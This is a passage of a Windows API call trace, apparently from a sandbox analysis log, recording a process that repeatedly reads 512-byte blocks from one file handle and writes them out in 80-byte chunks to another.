lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.739] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.739] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] GetFileType (hFile=0x50) returned 0x1 [0147.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.739] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] GetFileType (hFile=0x50) returned 0x1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] GetFileType (hFile=0x50) returned 0x1 [0147.740] _get_osfhandle (_FileHandle=1) returned 
0x50 [0147.740] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] GetFileType (hFile=0x50) returned 0x1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] GetFileType (hFile=0x50) returned 0x1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.740] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.740] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] GetFileType (hFile=0x50) returned 0x1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] GetFileType (hFile=0x50) returned 0x1 [0147.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.740] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) 
returned 1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] GetFileType (hFile=0x50) returned 0x1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] GetFileType (hFile=0x50) returned 0x1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] GetFileType (hFile=0x50) returned 0x1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] GetFileType (hFile=0x50) returned 0x1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] GetFileType (hFile=0x50) returned 0x1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0147.741] GetFileType (hFile=0x50) returned 0x1 [0147.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.741] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.741] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.741] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.742] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] GetFileType (hFile=0x50) returned 0x1 [0147.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.742] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.742] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.743] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.743] ReadFile 
(in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.743] GetFileType (hFile=0x50) returned 0x1 [0147.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.744] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.744] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, 
lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] GetFileType (hFile=0x50) returned 0x1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.744] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, 
lpOverlapped=0x0) returned 1 [0147.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.745] GetFileType (hFile=0x50) returned 0x1 [0147.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.745] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.745] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.745] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.745] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.745] GetFileType (hFile=0x50) returned 0x1 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.745] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.746] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, 
